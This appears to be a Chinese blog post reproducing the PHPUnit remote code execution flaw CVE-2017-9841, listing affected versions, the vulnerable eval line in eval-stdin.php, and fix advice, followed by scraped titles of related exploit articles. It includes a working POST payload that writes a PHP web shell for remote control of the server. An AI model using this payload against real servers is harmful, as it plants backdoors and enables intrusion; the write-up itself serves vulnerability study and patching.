phpunit 远程代码执行漏洞(CVE-2017-9841)复现
phpunit 远程代码执行漏洞(CVE-2017-9841)复现
上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。
漏洞概述:
- PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。
漏洞版本:
- 4.8.19 ~ 4.8.27
- 5.0.10 ~ 5.6.2
基本原理:
漏洞位于/phpunit/src/Util/PHP/eval-stdin.php。
eval('?>'.file_get_contents('php://input'));
漏洞复现:
- 总体来说就是向
vendor/phpunit/src/Util/PHP/eval-stdin.php
发送POST请求执行php代码。 - 例如直接执行phpinfo
- 也可以直接写入一句话木马。
<?=file_put_contents("1.php", '<?=eval($_REQUEST[1]);?>');
成功生成,即可菜刀连接。
漏洞修复:
果断一点,生产环境中直接删掉phpunit,没有用。
如果不想删,念旧情,直接升级吧,
懒打升级?那就直接设置权限,禁止访问该目录。
余生很长,请多指教。
phpunit 远程代码执行漏洞(CVE-2017-9841)复现相关推荐
- php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
- F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现
一.在vmware上安装BIGIP-15.1.0 进入F5官方主页:https://support.f5.com/csp/home 点击下载按钮(如下图所示) 进入页面后,我们选择v15.X版本 选择 ...
- Weblogic远程代码执行漏洞(CVE-2023-21839)复现/保姆级讲解
目录 引言 产品简介 漏洞描述 影响范围 漏洞复现 环境搭建 JDK安装: Weblogic安装: 漏洞利用 漏OracleOracle 引言 本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔 ...
- SMB v1远程代码执行漏洞(CVE-2020-1301)复现
0x00影响版本 参考:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301 0x01漏洞分 ...
- CVE-2021-1675: Windows Print Spooler远程代码执行漏洞
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...
- 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第二次更新...
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 ...
- CVE-2018-8174 IE浏览器远程代码执行漏洞
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...
- Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...
- [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
最新文章
- 【Spring实战】—— 5 设值注入
- Mac虚拟机安装windows教程--Parallels 5
- 《LeetCode力扣练习》第6题 C语言版 (做出来就行,别问我效率。。。。)
- 查看go 安装了哪些包_如何灵活地进行 Go 版本管理
- Ubuntu 16.04 下安装VMware Tools(三行命令搞定,亲测好使)
- 打开是什么样子的图片_情侣头像 | 无论是什么样子的你 我都好喜欢
- 三星Galaxy Note 20系列或将于8月5日发布
- linux中断调用spi函数,基于Linux的ARM与FPGA SPI驱动,中断函数调用spidev_sync_read(),出现异常...
- 20155303 2016-2017-2 《Java程序设计》第一周学习总结
- 使用VSCode玩转Java (二)
- Windows查看所有共享
- android gridview textview,gogo体育官方网站-gogo体育官方网站
- php递归算法计算n 介乘,递归算法示例——计算N的阶乘
- 计算机考博面试题,交大系统博士笔试和面试题目
- 【cocos creator与C++知识分享】 二.anysdk打包微信登录、微信分享
- 电脑同步控制android设备,Total Control 免费使用电脑同时控制多台手机的教程及使用方法...
- html背景图片不重叠铺满,html中背景图片铺满页面没有重复的效果
- 微信公众号学习与开发过程
- 计算机等级二级公共基础
- layui 动态绑定下拉框
热门文章
- HENUOJ-1007-CYT大佬的女装(贪心算法)
- 计算机启动进入桌面非常慢,电脑开机加载桌面很慢的解决办法
- MAC使用GTK创建界面
- cube函数matlab_Matlab geom3d函数注释
- CTF(信息安全夺旗赛)学习网址
- 【笑小枫的SpringBoot系列】【十五】SpringBoot根据模板生成Word
- 【雯女遭TVB封杀没剧拍】
- 手把手教你python实现量价形态选股知乎_如何通过量价形态选股
- 数学模型奶制品生产c语言编程,数学模型 奶制品的生产与销售.ppt
- 想听世界上最懂 JavaScript 的人和你讲JavaScript 吗?